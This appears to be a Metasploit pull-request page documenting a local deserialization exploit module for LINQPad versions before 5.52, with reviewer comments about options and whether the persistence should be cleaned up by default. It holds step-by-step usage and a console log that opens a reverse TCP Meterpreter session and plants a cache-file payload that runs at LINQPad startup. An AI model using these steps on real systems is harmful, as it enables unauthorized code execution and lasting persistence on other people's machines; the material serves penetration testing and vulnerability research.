Linqpad deserialization

[msutovsky-r7]

LINQPad 5.48 Deserialization

LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from here.

Verification Steps

Steps:

1. Install the application
2. Start msfconsole
3. Get Meterpreter/cmd shell
4. Run: use windows/local/linqpad_deserialization
5. Set payload - for example set payload cmd/windows/generic - and corresponding parameters
6. Set parameters session, cache_path, linqpad_path
7. Run exploit

Options

cache_path

The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.

linqpad_path

Final part of exploit runs the LINQPad to trigger deserialization procedure. The linpad_path parameter sets the path to LINQPad binary, which is ran at the end of exploit.

Example:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 192.168.95.128
msf6 exploit(multi/handler) > set LPORT 4242
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.95.128:4242 
[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_PATH C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
msf6 exploit(windows/local/linqpad_deserialization) > set session 1
msf6 exploit(windows/local/linqpad_deserialization) > exploit
[*] Exploit completed, but no session was created.

Previous example will run calc.exe when LINQPad will start.

[h00die]

#19592

[bwatters-r7]

Suggested change

	OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data'])
	OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']),
	OptBool.new('UNINSTALL', [true, 'Uninstall persistence', false])

[bwatters-r7]

Or other way that is consistent/add action.....?

[dledda-r7]

Doesn't this remove the persistence when the module finishes?

[msutovsky-r7]

It does, but only with CLEANUP option enabled. I checked other windows persistence modules and most of them seem to use some sort of cleanup when option is enabled. They don't do cleanup by default, but there's an option. I'm not sure how to generally work with persistence modules, but I can remove this if persistence module shouldn't have this.

[h00die]

Unfortunately you're in flux right now because the official persistence stuff isn't landed (or finished) yet.

I believe you should NOT cleanup because persistence shouldn't be a one time thing, it should be persistent.

I think while I was working on the other persistence modules I noticed a data store option to prevent cleanup. I think this is a great option to set to false by default, then allow a user to change it if they only want it once (PoC type showcase)

[dledda-r7]

@h00die thanks for your clarification, I'm gonna take a look at #19815 and after we land that I'll move to your burp persistence and this one.

[h00die]

https://github.com/rapid7/metasploit-framework/pull/19815/files#diff-d22add56d9bc0af40f788f4d21ac443f38f13f94b9ae0f2ad0496ba6d0d4b19eR11